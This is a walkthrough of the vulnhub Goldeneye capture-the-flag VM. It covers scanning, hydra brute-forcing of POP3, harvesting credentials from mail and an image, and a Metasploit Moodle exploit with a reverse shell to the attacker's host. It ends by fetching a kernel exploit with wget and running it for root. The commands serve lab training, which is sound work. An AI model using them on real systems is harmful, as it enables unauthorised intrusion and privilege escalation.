
This vulnhub Goldeneye walkthrough will show you every step in detail on how to get root level access and capture the final flag. If you would rather set up your own free pentesting labs, see my post on how to do so.

Here’s What You Need

  • Kali Linux Virtual Machine – VirtualBox
  • Goldeneye CTF Virtual Machine – vulnhub.com

Summary

What I enjoy most about this CTF challenge is that the Goldeneye machine is so immersed in everything about Goldeneye the film. There is a touch and feel to this box that invites you in to explore the details and leaves you feeling like a real Bond. Whether it comes from the feeling of working with other agents or from finding simple notes that defectors have left for you, there is something genuine about this CTF challenge.

On a technical level this box is very similar to OSCP-style boxes. It is not like most of the vulnhub CTF machines that are brain-twisting mind puzzles, which most people do not like. For example, the author has configured open source e-learning software and invites you to exploit it to achieve root level access on the box.

Setup

I imported the ova file I downloaded from vulnhub into VirtualBox. Next I added a bridged network adapter and then started up the VM.

With the GoldenEye movie playing on my tv let’s get started!

What I will cover

  • How to use gobuster
  • How to use dirb
  • How to use AutoRecon
  • How to use seclists
  • How to use nmap
  • How to exploit Moodle
  • How to use Burp Suite Decoder
  • How to use cc to compile exploits
  • How to use LinEnum for Linux privilege escalation
  • How to get files onto the target post exploitation

vulnhub Goldeneye walkthrough: remote enumeration

First, remote enumeration is done through an nmap scan. This scan tells me that ports 25 and 80 are open, which means we can learn more about the services running on HTTP and SMTP, or even POP3.

I also run AutoRecon and check the results of the AutoRecon scan. They reveal that there are several other open ports. This will be useful later.

[*] smtp found on tcp/25.
[*] http found on tcp/80.
[*] ssl/unknown found on tcp/55006.
[*] pop3 found on tcp/55007.

I try uncovering hidden directories that any user may have read or write access to by using gobuster and dirb, but there is nothing open.

gobuster dir -u http://10.0.0.206 -w ~/seclists/Discovery/Web-Content/common.txt -v

Knowing that port 80 is open, I navigate to the target’s address in a browser. You may recognize the name here, which is slightly different from the one in the 007 film: the Space Weapons Control Center located in Severnaya, Russia.

Go to /sev-home/ and try to login

The page instructions hold the first clue, suggesting that I go to /sev-home to log in. Doing so opens a new page with a login form. I try default credentials such as admin:admin and others, but with no luck.

Inspect the page source: /sev-home/

My next move is to inspect the page source for 10.0.0.206/sev-home/ and look for the first clue. There is a JavaScript file named terminal.js, so I open it and find some interesting notes in the comments section of the script.

Doing so reveals the next clue!

What is given in the comments of the page source is an encoded password, per the instructions. After trying CyberChef and other options I move ahead with Burp Decoder, using the smart decode option.

In doing so we have a password: InvincibleHack3r, which means that the credentials to try for a new login are boris:InvincibleHack3r.


Successfully logging in with the credentials means we are now logged into the /sev-home/ page. I am invincible! – Boris

Login using the new credentials

There is a new graphic playing on repeat on the page. You can take a break and watch it over and over, but then continue on!

Although Boris and Natalya are specifically mentioned in the comments, it is the lowercase version of the two names that serves as the viable usernames here. This means that only boris and natalya will get you a successful login to the /sev-home/ endpoint.

Looking closely at the /sev-home/ Goldeneye gif without getting distracted by the awesome graphics we can see the following.

“since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port.”

During the initial remote enumeration, was there a POP3 service identified as running on a high-numbered port?

Hacking the POP3 service

Brute force usernames and passwords

I have two usernames but what about their passwords? For this I use hydra in order to brute force the possible passwords for boris and natalya.

hydra -l boris -P /usr/share/wordlists/rockyou.txt -f 10.0.0.206 -s 55007 pop3

Brute forcing the passwords for the two usernames turns out to be more difficult than any of the previous steps. Cycling through my wordlists runs into auth errors that look like timeouts. After many minutes of trying wordlists there is one list that has a match: /usr/share/wordlists/fasttrack.txt. There it is, a match! Silly Boris has made his password simple, boris:secret1!, and while it is slightly complex it is also crackable.

The password is simple: what is something you sit on but can’t take with you?


Do the same process with natalya. It looks like Natalya is still “only a level II programmer”, as Boris says, because her password is simple and easily cracked.

Another match! natalya:bird

Read the mail messages for clues

I now have the username and password combinations for the two users but how do I hack further to get closer to a true exploit on the target?

One of the neat uses of netcat is that it can connect to TCP ports that are open and interact with them. This is true in this case which means I will connect to the POP3 port 55007 using netcat.

The objective here is to read the system mail for each of the users. Scrolling through Boris’s mail leads nowhere fast. However natalya has the next clue in her mail!

A new set of credentials: username xenia and password RCP90rulez! This step is complex, and as the mail mentions there are additional steps to take to progress forward.

Add site to /etc/hosts file

As the mail message says, we need to add this domain and its IP address to the hosts file on the Kali machine.

Navigate to http://severnaya-station.com which is now available after adding an entry for it in your hosts file.

Log in to Moodle as xenia:RCP90rulez! to proceed. Looking for private messages, I find one message with a new clue!

Escalate privileges in Moodle

Dr Doak gives us his username: doak! Repeat the process of hacking the POP3 service to get credentials for doak.

Now I repeat the process with the username doak and password goat.

From Doak’s private message to 007 we learn that he captured admin credentials.

Back to Moodle. Log in as doak:4England! and navigate to My Profile, then private messages.

Doak has sent 007 a secret message declaring that he has found the credentials for an admin account. He also says that he can’t paste the password for the account since the Goldeneye servers scan for cleartext credentials across the network.

What does hiding secrets in images sound like to you? Steganography!

The image must hold some clues so let us download it locally and run strings on it to see what lies inside the file.

The image file has random ASCII strings, but it does have what appears to be a Base64 encoded string, which could be a password! Use Burp Decoder again to decode the Base64 encoded password for the admin account.

There is a new credential for an admin account, username admin and password xWinter1995x!

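As an added example (not from the original walkthrough), here is a small Python stand-in for the `strings` step and the Base64 decode done in Burp Decoder: it pulls printable runs out of a binary file and decodes any token that is valid Base64 and yields clean text. The image bytes are constructed for this example, with the Base64 form of the password the walkthrough recovers embedded in them; `SAMPLE_IMAGE`, `extract_strings` and `find_encoded_secrets` are names chosen here. The same scan is what you would run over your own files and repositories when checking for credentials tucked away this way.

```python
import base64
import re
import string

# Constructed stand-in for the downloaded image: binary noise with a single
# Base64 token embedded, the way it showed up in the `strings` output. The
# token is the Base64 form of the admin password the walkthrough recovers.
SAMPLE_IMAGE = (
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\x00\xff\xd8\xff"
    + b"\x12\x00\x7f" * 9
    + b"eFdpbnRlcjE5OTV4IQ==\x00\x00"
    + b"\xa3\x01\x02IEND\xaeB`\x82"
)

PRINTABLE = string.printable.encode("ascii")


def extract_strings(data, min_len=4):
    """Mimic `strings`: runs of at least min_len printable ASCII bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def looks_like_base64(token):
    """Canonical alphabet, length a multiple of 4, '=' padding only at the end."""
    return len(token) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token) is not None


def find_encoded_secrets(data, min_len=12):
    """Return (token, decoded_text) for Base64 tokens that decode to clean text."""
    hits = []
    for text in extract_strings(data):
        for token in re.findall(r"[A-Za-z0-9+/=]{%d,}" % min_len, text):
            if not looks_like_base64(token):
                continue
            try:
                raw = base64.b64decode(token, validate=True)
            except ValueError:
                continue  # right alphabet, but not actually Base64
            # Only keep results that are fully printable: random binary that
            # happens to match the alphabet decodes to garbage and is skipped.
            if raw and all(b in PRINTABLE for b in raw):
                hits.append((token, raw.decode("ascii")))
    return hits


if __name__ == "__main__":
    print(extract_strings(SAMPLE_IMAGE))
    for token, secret in find_encoded_secrets(SAMPLE_IMAGE):
        print(f"{token} -> {secret}")
```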

Exploit Moodle 2.23 with Metasploit

Finding the version of Moodle installed is easy enough; it can be done by navigating around the site looking for details. Looking at all the available exploits for Moodle 2.23 leads to one that is delivered through Metasploit. *OSCP sigh*

The exploit requires that we enter admin level credentials in order for it to work. We have those now!

msf5 exploit(multi/http/moodle_cmd_exec) > show options

Module options (exploit/multi/http/moodle_cmd_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   xWinter1995x!    yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.0.0.206       yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SESSKEY                     no        The session key of the user to impersonate
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /gnocertdir      yes       The URI of the Moodle installation
   USERNAME   admin            yes       Username to authenticate with
   VHOST      severnaya-station.com                 no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.250       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

By default the payload will be cmd/unix/reverse so setting the payload is optional.

Once again the Guru is apparently the only one who covers the little details that every other tutorial leaves out. You have to set the VHOST value to get this exploit to work!

set VHOST severnaya-station.com

Why does it matter? In this scenario severnaya-station.com is a virtual host (VHOST) sitting on 10.0.0.206, the IP address of the target VM. Apache picks the site to serve from the HTTP Host header, so a request addressed only to the bare IP never reaches the Moodle install under that name.
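To show why the VHOST option matters, here is an added example (not from the original walkthrough or from the Metasploit module): the raw request a client sends to RHOSTS with and without a VHOST, and the name-based routing a web server such as Apache applies to it. The vhost table, page bodies and the helper names `build_request` and `route_request` are constructed for this example.

```python
# Constructed vhost table. As on the target, the Moodle install answers only
# under the severnaya-station.com name; any other Host value gets the default site.
VHOSTS = {"severnaya-station.com": "Moodle at /gnocertdir"}
DEFAULT_SITE = "Severnaya landing page (default vhost)"
TARGET_IP = "10.0.0.206"


def build_request(path, rhost, vhost=None):
    """Build the raw HTTP/1.1 request a client sends to RHOSTS.

    The TCP connection always goes to rhost; the Host header carries vhost
    when one is set (Metasploit's VHOST option), otherwise the bare IP.
    """
    host_header = vhost if vhost else rhost
    return f"GET {path} HTTP/1.1\r\nHost: {host_header}\r\n\r\n"


def route_request(raw):
    """Name-based virtual hosting as Apache does it: pick the site by Host header."""
    head, _, _ = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Strip any :port suffix; the ServerName is matched without it.
    host = headers.get("host", "").split(":")[0].lower()
    return VHOSTS.get(host, DEFAULT_SITE)


if __name__ == "__main__":
    for vhost in (None, "severnaya-station.com"):
        req = build_request("/gnocertdir/", TARGET_IP, vhost)
        print(repr(req), "->", route_request(req))
```

Without VHOST the request carries `Host: 10.0.0.206` and lands on the default site, which is why the module fails until the option is set.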

Now that I have an open shell on the target it is time to do some new enumeration and see where we can escalate privileges to root and somehow grab the flag.

Post exploitation enumeration

Enumeration is not just for the beginning stages of ethical hacking; there is always an opportunity to do more enumeration. In fact, “enumeration is key” is an adage that is wise to adopt for every engagement you are part of.

There are many options to do enumeration post exploitation, but I prefer the automated methods. One such method is LinEnum which gathers common misconfigurations and vulnerabilities in Linux systems.

# host LinEnum.sh on the Kali machine
$ python -m SimpleHTTPServer 8000

# download LinEnum.sh to the target (SimpleHTTPServer speaks plain HTTP, not HTTPS)
$ wget http://10.0.0.250:8000/LinEnum.sh

# make it executable and run it
$ chmod +x LinEnum.sh
$ ./LinEnum.sh

The results come back with several promising features, but here are the highlights.

[-] htpasswd found - could contain passwords:
/etc/apache2/.htpasswd
boris:$apr1$vg2drJim$wUDKP9TLw5jq4GS5jq2240
ops:$apr1$mVvEblRU$oHDbEs4QP2YTUG25Z1PoP.

We could crack the password hashes or, as seen below, check what listening ports are open on the target to get a feel for what is exploitable.

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:55006           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:55007           0.0.0.0:*               LISTEN      -               
tcp6       0      0 ::1:5432                :::*                    LISTEN      -               
tcp6       0      0 :::25                   :::*                    LISTEN      -               
tcp6       0      0 :::55006                :::*                    LISTEN      -               
tcp6       0      0 :::55007                :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:55322           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp6       0      0 :::13853                :::*                                -               

vulnhub Goldeneye walkthrough – kernel exploit to get root

Using a kernel exploit should be a last resort as it can crash services on the target especially on older systems. But in this case our post exploitation enumeration did not lead to anything promising. That means that a kernel exploit is most likely what is intended by the vulnhub Goldeneye CTF author.

Linux ubuntu 3.13.0-32-generic

Searching Google for exploits returns a result from Exploit-DB. To fetch the exploit I use searchsploit -m 37292, which copies the exploit file locally.

The compiler on the target VM returns the error sh: 1: gcc: not found, which means that gcc, a C compiler, is not installed. You could install gcc, but there is another option that uses what is already installed on the target. We will use cc, the traditional UNIX C compiler command, to compile this exploit.

However before that can take place I have to fix something in the exploit script itself. Where the script says gcc I replace it with cc instead.

# compile the kernel exploit on your Kali or on the target using cc
$ cc 37292.c -o exploit

This will compile the exploit and output its binary named “exploit”.

vulnhub goldeneye walkthrough - gcc is not installed so I have to use cc instead

So I have an exploit compiled and ready to go; what’s next? Since it is sitting on my Kali VM it is not doing much good, so I will upload it to the target using the Python module SimpleHTTPServer. You can also use apache2, but I prefer this method.

# host the exploit binary on Kali
$ python -m SimpleHTTPServer 8000

With the exploit hosted I will download it from the shell I have open on the target.

# download the exploit to the target
$ wget http://10.0.0.250:8000/exploit

First I change the execution permission for the file so that my user www-data can actually execute it. From here I run the exploit which I have just compiled in the previous step and achieve root access as a result.

# make the exploit executable
$ chmod u+x exploit

# run the exploit
$ ./exploit

vulnhub goldeneye walkthrough – root access achieved!

Be sure to go to the final page http://severnaya-station.com//006-final/xvf7-flag/
